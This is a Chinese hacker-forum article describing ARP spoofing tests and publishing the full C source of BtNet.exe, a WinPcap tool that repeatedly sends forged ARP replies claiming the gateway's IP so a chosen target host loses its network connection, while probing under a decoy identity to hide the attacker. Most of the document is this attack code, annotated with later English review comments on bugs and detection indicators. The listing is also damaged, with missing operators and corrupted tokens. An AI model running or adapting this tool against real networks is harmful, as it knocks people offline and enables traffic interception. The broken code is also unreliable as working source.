
基於 ARP 協議欺騙的網絡攻擊程序源代碼 BtNet.exe

[摘要]信息來源:紅客聯(lián)盟 文章作者:粗魯 阿爾普的基礎(chǔ)上欺騙的網(wǎng)絡(luò)攻擊程序 寫的魯?shù)? 主頁: http://xEyes.cdut.net/ruder/ & & http://www.c...
信息來源:紅客聯盟

文章作者:Ruder

基於 ARP 欺騙的網絡攻擊程序

作者:Ruder

主頁: http://xEyes.cdut.net/ruder/ & & http://www.cnwill.com/ruder/

電子郵件: cocoruder@163.com

最近開始學習 WinPcap,看了很多高手寫的基於 ARP 欺騙的抓包工具,特別是電子科大的前輩 TOo2y 的《詳談調用 WinPcap 驅動寫 ARP 多功能工具》一文,令我受益匪淺。下面是我把這個思路改寫成 ARP 攻擊程序(可使目標主機斷開網絡連接)時做的一些測試。高手請跳過,以免有班門弄斧之嫌。

一般的 ARP 欺騙是向被欺騙主機發送 ARP 應答(reply)數據報,把其中的源 IP 地址設為被欺騙主機要通信的那台主機的地址,源 MAC 地址則改為自己的 MAC 地址。假設有兩台機器 A、B:向 A 發送 ARP 應答數據報,其中源 IP 地址為 B 的地址,源 MAC 地址為我的機器的 MAC 地址(本機開啟 IPRouter 功能以確保數據被轉發),那麼 A 發往 B 的數據報就會發到我的機器;對 B 做同樣的操作後,A <==> B 之間的數據就會經過我的機器轉發,直到有一個正常的 ARP 包更新了 A、B 的 ARP 緩存為止。

那麼,如果把發送給 A 的 ARP 數據報中的源 IP、源 MAC 改成任意值,會出現什麼現象?下面列出我的幾個測試:

1. 源 IP 改為網關 IP,源 MAC 改為不存在的 MAC 地址

對目標主機幾乎沒有影響

2. 源 IP 改為網關 IP,源 MAC 改為網內任意一台存在、但沒有開啟 IPRouter 的主機的 MAC 地址

幾乎沒有影響

3. 源 IP 改為網關 IP,源 MAC 改為目標主機自己的 MAC

目標主機立刻斷網!

可見,當我們把經過構造的 ARP 應答包發給目標主機時,目標主機的 ARP 緩存會被更改;之後數據在封裝到 MAC 層時,會把網關的 IP 和目標主機自己的 MAC 地址封裝在一起,於是本該發往網關的數據報只能發給自己,哈哈。

至於第 1 種情況,猜想大概是因為該 MAC 地址不存在,目標主機會廣播 ARP 請求包並重新更新了自己的 ARP 緩存所致。

至於第 2 種情況,猜想是源 MAC 地址所屬的那台主機會向目標主機返回一個 ARP 應答。

水平有限,所以以上只是猜測,知道原因的請告訴我,先謝過了。

再說一下:以上測試只針對 Windows 系統;當然,也在沒有配置好的 Red Hat 上測試成功過。

測(cè)試程序( BtNet.exe ) :

用法: BtNet -h attackIP -o gateIP [-m spoofedMAC]

-m 參數是你要修改成的源 MAC 地址。

為了隱藏攻擊者的身份,程序在獲取目標主機的 MAC 地址時會偽裝成 IP:128.128.128.128、MAC:a5-a5-a5-a5-a5-a5;這樣可能出現無法獲取目標主機 MAC 地址的情況,此時需要借助第三方工具來獲取 MAC 地址。

附測(cè)試代碼

#include "packet32.h"

#include "ntddndis.h"

#include <stdio.h>

#include <conio.h>

#include <winsock2.h>

#include <windows.h>

#pragma comment(lib,"ws2_32")

#pragma comment(lib,"packet")

/* EtherType values carried in ETHDR.eh_type; ETH_IP is also used as the ARP protocol type. */
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
/* ARP opcodes carried in ARPHDR.arp_opt. */
#define ARP_REQUEST 0x0001 // ARP request
#define ARP_REPLY 0x0002 // ARP reply
/* ARP hardware type 1 = Ethernet; written to ARPHDR.arp_hdr. */
#define ARP_HARDWARE 0x0001
/* Number of rows in adapterlist[]; main() does not check this bound while filling the list. */
#define max_num_adapter 10

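/*
 * Wire-format structures. They are memcpy'd straight into and cast straight
 * onto raw frames, so they must be packed to 1 byte with no padding.
 */
#pragma pack(push,1)

/* Ethernet II frame header: 14 bytes. */
typedef struct ethdr
{
    unsigned char eh_dst[6];   // destination MAC address
    unsigned char eh_src[6];   // source MAC address
    unsigned short eh_type;    // EtherType (ETH_IP / ETH_ARP), network byte order
} ETHDR, *PETHDR;

/*
 * ARP packet body for Ethernet + IPv4.
 * arp_spa/arp_tpa are declared unsigned long; the 28-byte on-wire layout
 * holds only where that type is 4 bytes wide (true on Windows, which is
 * the only platform this WinPcap program targets).
 */
typedef struct arphdr
{
    unsigned short arp_hdr;    // hardware type (ARP_HARDWARE)
    unsigned short arp_pro;    // protocol type (ETH_IP)
    unsigned char arp_hln;     // hardware address length (6)
    unsigned char arp_pln;     // protocol address length (4)
    unsigned short arp_opt;    // opcode (ARP_REQUEST / ARP_REPLY)
    unsigned char arp_sha[6];  // sender hardware (MAC) address
    unsigned long arp_spa;     // sender protocol (IP) address
    unsigned char arp_tha[6];  // target hardware (MAC) address
    unsigned long arp_tpa;     // target protocol (IP) address
} ARPHDR, *PARPHDR;

/* One IP address and the MAC address learned for it by sniff(). */
typedef struct ip_mac
{
    u_long ip;                 // stored in host byte order by main()
    unsigned char mac[6];
} IP_MAC, *PIP_MAC;

/* Restore the packing that was in effect before the push above. */
#pragma pack(pop)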

/*
 * File-scope state shared by main() and the threads it creates (sniff,
 * sendARPPacket, sendSRTimer/sendSR). No lock or atomic protects any of it;
 * main() relies on Sleep() calls for ordering.
 */
/* Adapter opened by main() with PacketOpenAdapter; used by every capture/send call. */
LPADAPTER lpAdapter;
/* Adapter names copied out of the PacketGetAdapterNames buffer by main(). */
char adapterlist[max_num_adapter][1024];
/* Target host (-h argument): IP set by main(), MAC filled in by sniff(). */
IP_MAC toipandmac;
/* Gateway (-o argument) and the local machine: IP set by main(), MAC filled in by sniff(). */
IP_MAC oipandmac,myipandmac;
/* TRUE once main() has parsed a -m option. */
BOOL param6=FALSE;
/* Cursor into the -m argument while main() splits it. */
char *noMACstr;
/* The six two-character hex groups of the -m argument, each NUL-terminated. */
char noMAC[6][3];
/* mytoIP: target IP handed to sendSR by sendSRTimer; oIP: gateway IP. Both host byte order. */
u_long mytoIP,oIP;
/* When TRUE, sendARPPacket uses the real local IP/MAC instead of the decoy sender. */
BOOL sendtoOip;
/* Message-loop state and timer id used by sendSRTimer. */
MSG msg;
UINT newtimer;
/* Decoy sender IP placed in the probing ARP requests; a fixed value, so it is a usable detection indicator. */
char MYIP[20]="128.128.128.128";
/* Set by sniff() once the MAC for the corresponding IP has been learned. */
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

/*
 * Convert one hexadecimal digit character to its value.
 * Returns 0-15 for '0'-'9', 'a'-'f' and 'A'-'F'; returns -1 for any other
 * character.
 */
int getint(char c)
{
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    if (c >= 'a' && c <= 'f') {
        return c - 'a' + 10;
    }
    if (c >= 'A' && c <= 'F') {
        return c - 'A' + 10;
    }
    return -1;
}

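/*
 * Print the program banner and command-line usage to stdout.
 * main() calls this when the argument count or the option flags are wrong.
 */
void start(void)
{
    /* Printed in order, exactly as listed; each entry carries its own newlines. */
    static const char *const banner[] = {
        "BtNet //--an ARP Tool test the Windows Break the Internet\n",
        "written by Ruder,10/2003\n",
        "Homepage: http://xEyes.cdut.net/ruder/index.htm\n",
        "E-mail: cocoruder@163.com\n",
        "\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n",
        "Example:\n",
        "BtNet -h 202.115.138.12 -o 202.115.138.1\n",
        "BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n",
        " Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n",
    };
    size_t i;

    for (i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        /* fputs, not printf: the text is data, not a format string. */
        fputs(banner[i], stdout);
    }
}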

/*
 * Capture thread. Puts the adapter into promiscuous mode, reads frames
 * through the WinPcap packet API and, for every ARP reply whose sender IP
 * equals one of the three addresses of interest (target, gateway, local
 * host), prints the IP/MAC pair and records the MAC in the matching global
 * (toipandmac / oipandmac / myipandmac), setting its *_flag.
 * Returns 0 on every path: when all three MACs are known, when a key is
 * pressed, or when a WinPcap call fails.
 *
 * NOTE(review): the unnamed LPVOID parameter only compiles as C++.
 * NOTE(review): neither lppackets nor lpPacketr is ever released with
 * PacketFreePacket, and lppackets is never used after it is allocated.
 * NOTE(review): the listing on this page is extraction-damaged; operators
 * are missing in the three-clause condition below, so it does not compile
 * as shown.
 */
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
// 256,000-byte receive buffer held as an automatic (stack) array of this thread.
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %d\n",GetLastError());
return 0;
}
// Promiscuous mode: the adapter is asked to deliver frames not addressed to this host.
// Failure is only warned about, capture continues.
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
// 500 KiB driver-side capture buffer.
if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return 0;
}
if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeout\n");
}
if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
return 0;
}
PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));
// Main capture loop; any key press ends the thread.
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;
off=0;
// One read can return several frames, each preceded by a struct bpf_hdr.
while(off<ulbytesreceived)
{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
// base is assigned here but not read again in this function.
base=pChar;
// Advance to the next record before parsing this one.
off=Packet_WORDALIGN(off+hdr->bh_caplen);
// NOTE(review): bh_caplen is not compared with sizeof(ETHDR)+sizeof(ARPHDR)
// before the headers below are dereferenced; a short captured frame is read
// past its end.
eth=(PETHDR)pChar; // Ethernet header
arp=(PARPHDR)(pChar+sizeof(ETHDR)); // ARP header
int i;
// Only ARP replies are of interest.
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
// Stop as soon as all three MAC addresses have been learned.
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
// The globals hold host-order IPs, so the wire value is byte-swapped before comparing.
// NOTE(review): the operators joining these three clauses are missing on this page.
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
printf("[MAC]:");
// The MAC printed and stored is the Ethernet source address of the frame,
// not the sender hardware address inside the ARP body (arp_sha).
for(i=0;i<5;i++)
{
printf("%.2x-",eth->eh_src[i]);
}
printf("%.2x",eth->eh_src[5]);
printf("\n");
// Target host (-h).
if (toipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
toipandmac.mac[i]=eth->eh_src[i];
toipandmac_flag=TRUE;
}
// Gateway (-o).
if (oipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
oipandmac.mac[i]=eth->eh_src[i];
oipandmac_flag=TRUE;
// printf("if you have get the MAC Addresses enough,Press any key for staring!\n");
}
// Local machine.
if(myipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
myipandmac.mac[i]=eth->eh_src[i];
myipandmac_flag=TRUE;
}
}
}
}
continue;
}
}
return 0;
}

/*
 * Thread routine: broadcast one ARP request asking for the MAC address of
 * the IP pointed to by dwsendtoIP (a u_long in host byte order). The reply
 * is expected to be picked up by sniff(). Always returns 0.
 *
 * Sender fields as written here:
 *   - default: sender IP = MYIP (128.128.128.128), Ethernet source and
 *     sender MAC = a5:a5:a5:a5:a5:a5, i.e. a decoy identity;
 *   - when sendtoOip is TRUE and the local MAC is known: the real local
 *     IP and MAC from myipandmac.
 * For defenders: a broadcast ARP request carrying that fixed decoy pair is
 * a wire-level indicator of this program as published on this page.
 *
 * NOTE(review): lpPacket is not freed on the "My MAC Address Can't Find!"
 * return path.
 * NOTE(review): the `ð` token in the first memcpy below is extraction
 * damage on this page (an HTML entity was decoded inside the code); the
 * listing does not compile as shown.
 */
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
LPPACKET lpPacket;
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
u_long sendtoIP=*(u_long *)dwsendtoIP;
//struct sockaddr_in sin;
lpPacket = PacketAllocatePacket();
if(lpPacket==NULL)
{
printf("\nPacketAllocatePacket error!");
return 0;
}
eth.eh_type=htons(ETH_ARP);
// Broadcast destination; decoy source MAC a5:a5:a5:a5:a5:a5.
for(i=0;i<6;i++)
{
eth.eh_dst[i]=0xff;
eth.eh_src[i]=0xa5;
arphdr.arp_sha[i]=0xa5;
arphdr.arp_tha[i]=0xff;
}
arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REQUEST);
arphdr.arp_hln=6;
arphdr.arp_pln=4;
arphdr.arp_tpa=htonl(sendtoIP);
// htonl(ntohl(x)) is a no-op pair: the decoy IP stays in network byte order.
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
// For the gateway query main() sets sendtoOip, and the real local identity replaces the decoy.
if(sendtoOip)
{
if(myipandmac_flag)
{
for(i=0;i<6;i++)
{
eth.eh_src[i]=myipandmac.mac[i];
arphdr.arp_sha[i]=myipandmac.mac[i];
// Loop-invariant: assigned on every iteration with the same value.
arphdr.arp_spa=htonl(myipandmac.ip);
//memset(MYIP,0,sizeof(MYIP));
}
}
else
{
printf("My MAC Address Can't Find!\n");
return 0;
}
}
// 14-byte Ethernet header + 28-byte ARP body, zero-padded to a 60-byte frame.
memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,ð,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);
return 0;
}

/*
 * Build and transmit one forged ARP reply to the target host (mytoIP),
 * then print what was sent. Installed as the timer callback by
 * sendSRTimer, which fires it every 5 seconds. Always returns 0.
 *
 * Frame contents as written here:
 *   - sender IP  = oIP (the -o gateway address), target IP = mytoIP;
 *   - default: Ethernet source, Ethernet destination, sender MAC and
 *     target MAC are all the target's own MAC;
 *   - with -m: Ethernet source and sender MAC are the -m value, the
 *     destination/target MAC is still the target's MAC.
 * The effect described in the article is that the target's ARP cache maps
 * the gateway IP to the wrong MAC, so its off-subnet traffic goes nowhere.
 *
 * For defenders: the observable is a unicast ARP reply claiming the
 * gateway's IP with a MAC that is not the gateway's, repeated on a fixed
 * 5-second period; in the default mode the frame's source MAC equals its
 * destination MAC. Usual controls are a static ARP entry for the gateway
 * on hosts and switch-side Dynamic ARP Inspection / port security;
 * ARP-cache monitoring flags the changed gateway binding.
 *
 * NOTE(review): declared `DWORD WINAPI sendSR()` but used as a TIMERPROC,
 * whose Win32 signature is void CALLBACK(HWND, UINT, UINT_PTR, DWORD); the
 * cast in sendSRTimer hides an argument-count mismatch.
 * NOTE(review): lpPacket is leaked on both early returns after allocation
 * (target MAC unknown, bad -m digit).
 * NOTE(review): extraction damage on this page: an operator is missing in
 * the `(t1==-1) (t2==-1)` test and `ð` replaces an argument in the first
 * memcpy; the listing does not compile as shown.
 */
DWORD WINAPI sendSR()
{
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
LPPACKET lpPacket;
unsigned char toMAC[6];
struct sockaddr_in sin;
u_long toIP=mytoIP;
//if ((myipandmac_flag==FALSE) (oipandmac_flag==FALSE) (toipandmac_flag==FALSE))
//{
// printf("Can't get all MAC address!\n");
// return 0;
//}
lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf("\nError:failed to allocate the LPPACKET structure.\n");
return 0;
}
// Nothing is sent until sniff() has learned the target's MAC.
if (toipandmac_flag==FALSE)
{
printf("Can't get toMAC address!\n");
return 0;
}
memset(toMAC,0,sizeof(toMAC));
memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));
// -m given: use the six hex pairs split out by main() as the claimed source MAC.
if (param6)
{
for(i=0;i<6;i++)
{
int t1,t2;
char c1,c2;
c1=noMAC[i][0];
c2=noMAC[i][1];
t1=getint(c1);
t2=getint(c2);
// getint returns -1 for a non-hex character.
if((t1==-1) (t2==-1))
{
printf("-m parameter error!\n");
return 0;
}
eth.eh_src[i]=t1*16+t2;
eth.eh_dst[i]=toMAC[i];
arphdr.arp_sha[i]=t1*16+t2;
arphdr.arp_tha[i]=toMAC[i];
}
}
else
{
// Default: every MAC field, source included, is the target's own MAC.
for(i=0;i<6;i++)
{
eth.eh_src[i]=toMAC[i];
eth.eh_dst[i]=toMAC[i];
arphdr.arp_sha[i]=toMAC[i];
arphdr.arp_tha[i]=toMAC[i];
}
}
eth.eh_type=htons(ETH_ARP);
// Sender IP is the gateway address; oIP and toIP are held in host byte order.
arphdr.arp_spa=htonl(oIP);
arphdr.arp_tpa=htonl(toIP);
arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REPLY);
arphdr.arp_hln=6;
arphdr.arp_pln=4;
// 14-byte Ethernet header + 28-byte ARP body, zero-padded to a 60-byte frame.
memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,ð,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);
// Console log of the frame just sent: target IP, claimed IP, claimed MAC.
sin.sin_addr.s_addr=arphdr.arp_tpa;
printf("spoof %s: ",inet_ntoa(sin.sin_addr));
sin.sin_addr.s_addr=arphdr.arp_spa;
printf("%s-->",inet_ntoa(sin.sin_addr));
for(i=0;i<5;i++)
printf("%.2x-",arphdr.arp_sha[i]);
// Last octet uses %x, so it is not zero-padded like the first five.
printf("%x",arphdr.arp_sha[5]);
printf("\n");
return 0;
}

/*
 * Thread routine: store the target IP (*dwtoIP, host byte order) in the
 * global mytoIP, start a 5000 ms thread timer whose callback is sendSR,
 * and pump this thread's message queue so the timer callback is dispatched.
 * Returns 0 only if GetMessage returns 0.
 *
 * NOTE(review): `TIMERPROC(sendSR)` is a C++ functional cast that hides a
 * signature mismatch; sendSR is declared with no parameters and a DWORD
 * return, unlike TIMERPROC.
 * NOTE(review): nothing visible in this file posts WM_QUIT or calls
 * KillTimer, so the loop has no normal exit; a GetMessage error return of
 * -1 is also treated as "keep looping".
 */
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
printf("Waiting spoof Start\n");
mytoIP=*(u_long *)dwtoIP;
// Fixed 5-second period; this interval is what makes the forged replies periodic on the wire.
newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));
while(GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}

/*
 * Entry point. Parses `-h attackIP -o gateIP [-m spoofedMAC]`, lets the
 * user pick a WinPcap adapter, prints host information, then:
 *   1. starts the sniff() capture thread;
 *   2. sends three ARP requests via sendARPPacket (local IP, target IP,
 *      gateway IP) so sniff() can learn the three MAC addresses;
 *   3. starts sendSRTimer, which emits the forged ARP reply every 5 s,
 *      and blocks on that thread.
 * Returns 0 after printing usage or on normal exit, -1 on adapter errors.
 *
 * NOTE(review): extraction damage on this page: operators are missing in
 * several conditions below (option check, adapter-name loop, do/while
 * test, adapter-handle check) and `INVALID_HANDLE_value` has lost its
 * capitalisation; the listing does not compile as shown.
 * NOTE(review): ordering between the threads relies only on Sleep()
 * delays; there is no check that a MAC was actually learned before the
 * next step runs.
 */
int main(int argc,char *argv[])
{
HANDLE thread1,thread2,thread3;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadid1,threadid2,threadid3;
u_long toIP,myip;
struct NetType ntype;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,j;
long npflen;
// Exactly 4 or 6 arguments are accepted; anything else prints usage.
if((argc!=5)&&(argc!=7))
{
start();
return 0;
}
else if((strcmp(argv[1],"-h")!=0) (strcmp(argv[3],"-o")!=0))
{
start();
return 0;
}
// Both addresses are kept in host byte order.
// NOTE(review): inet_addr's INADDR_NONE failure value is not checked.
toIP=ntohl(inet_addr(argv[2]));
oIP=ntohl(inet_addr(argv[4]));
// With argc==5, argv[5] is the terminating NULL, so this test is safe.
if (argv[5]!=NULL)
{
if (strcmp(argv[5],"-m")==0)
{
noMACstr=argv[6];
j=0;
// Split "xx-xx-xx-xx-xx-xx" at a fixed stride of 3 characters.
// NOTE(review): the length of argv[6] is never checked, so a short
// argument is read past its terminator.
for(i=0;i<6;i++)
{
memset(noMAC[i],0,sizeof(noMAC[i]));
memcpy(noMAC[i],noMACstr,2);
noMACstr=noMACstr+3;
}
param6=TRUE;
}
}
printf("\nLibarary Version: %s",PacketGetVersion());
adapterlength=sizeof(adaptername);
if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) // get the list of network adapters
{
printf("PacketGetAdapterNames Error: %d\n",GetLastError());
return -1;
}
// The buffer is walked as consecutive NUL-terminated WCHAR strings,
// presumably ending at an empty string; confirm against the WinPcap
// version in use.
name1=adaptername;
name2=adaptername;
i=0;
// NOTE(review): on the first iteration *(name1-1) reads one element before
// adaptername; i is not bounded by max_num_adapter and the copy length is
// not bounded by the 1024-byte row size.
while((*name1!='\0') (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
// 2 bytes per WCHAR; the terminator is not copied (rows start zeroed as globals).
memcpy(adapterlist[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
adapternum=i;
printf("\nAdapters Installed:\n");
for(i=0;i<adapternum;i++)
wprintf(L"%d - %s\n",i+1,adapterlist[i]);
// Prompt until a number in 1..adapternum is entered.
// NOTE(review): scanf's return value is ignored; on non-numeric input
// `open` stays uninitialised and the unread input makes the loop spin.
do
{
printf("\nSelect the number of the adapter to open: ");
scanf("%d",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 open>adapternum);
lpAdapter=PacketOpenAdapter(adapterlist[open-1]);
if(!lpAdapter (lpAdapter->hFile==INVALID_HANDLE_value))
{
printf("PacketOpenAdapter Error: %d\n",GetLastError());
return -1;
}
if(PacketGetNetType(lpAdapter,&ntype))
{
printf("\n\t\t*** Host Information ***\n");
printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
}
// Read the adapter's first address entry to learn the local IP.
npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
myip=ntohl(sin.sin_addr.s_addr);
// Only the label is printed here; the local MAC is printed later by sniff().
printf("[MACAddress:]");
}
else
{
printf("\nNot get enough data\n");
//PacketFreePacket(lppackets);
PacketCloseAdapter(lpAdapter);
return -1;
}
printf("\n");
// Seed the three lookup records; sniff() fills in the MACs.
oipandmac.ip=oIP;
toipandmac.ip=toIP;
myipandmac.ip=myip;
sendtoOip=FALSE;
// NOTE(review): thread1's handle is never waited on or closed.
thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
Sleep(300);
// Probe 1: local IP, decoy sender identity.
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
Sleep(100);
CloseHandle(thread2);
// Probe 2: target IP, decoy sender identity.
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// Probe 3: gateway IP, sent with the real local IP/MAC (sendtoOip).
sendtoOip=TRUE;
Sleep(200);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// WaitForSingleObject(thread1,INFINITE);
// Start the periodic forged-reply sender and block on it.
thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
WaitForSingleObject(thread3,INFINITE);
PacketCloseAdapter(lpAdapter);
return 0;
}

